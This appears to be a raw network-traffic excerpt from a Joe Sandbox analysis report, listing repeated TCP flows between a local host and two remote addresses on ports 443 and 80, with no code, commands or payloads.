Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49700 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49700
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49701
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49702 -> 13.107.246.38:443
Source: global trafficTCP traffic: 13.107.246.38:443 -> 192.168.2.7:49702
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: global trafficTCP traffic: 192.168.2.7:49698 -> 209.46.124.102:80
Source: Joe Sandbox ViewIP Address: 13.107.246.38 13.107.246.38
